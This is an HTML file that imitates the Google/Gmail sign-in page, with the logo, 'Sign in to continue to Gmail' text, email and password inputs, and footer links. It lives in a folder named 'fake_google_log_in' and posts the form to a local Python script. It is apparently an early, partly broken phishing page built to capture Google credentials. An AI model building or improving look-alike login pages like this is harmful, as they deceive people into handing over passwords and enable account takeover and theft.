<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <title>Gmail</title>
    <link rel="stylesheet" href="c:/Users/topiary/Documents/fake_google_log_in/static/google_login_page.css">
</head>

<body class="background">

    <section class="login_box">
        <div class="login_row">
            <div class="login_horizontal_horizontal_box">
                <div class="box_contents">

                    <img src="google logo.png" class="logo" alt="Google Logo">

                    <div class="login_content_sign_in_h1">
                        <p>Sign in</p>
                        <span class="continue_text">to continue to Gmail</span>
                    </div>



                    <form method="POST" action="c:/Users/topiary/Documents/fake_google_log_in/google_login_page.py">
                        <input class="login_input" type="text" placeholder="Email or phone" required>
                        <input class="login_input" type="text" placeholder="Password" required>

                    </form>

                    <div class="forgot_email"><a href="#">Forgot email?</a></div>

                    <p class="guest_msg">
                        Not your computer? Use Guest mode to sign in privately.
                        <a href="#">Learn more about using Guest mode</a>
                    </p>

                    <div class="bottom_buttons">
                        <a class="create_account" href="#">Create account</a>
                        <button class="next_btn" href="www.gmail.com">Next</button>
                    </div>

                </div>
            </div>
        </div>
    </section>

    <footer class="footer_row">
        <div class="footer_left">
            <p>English (United States)</p>
        </div>
        <div class="footer_right">
            <a href="#">Help</a>
            <a href="#">Privacy</a>
            <a href="#">Terms</a>
        </div>
    </footer>

</body>

</html>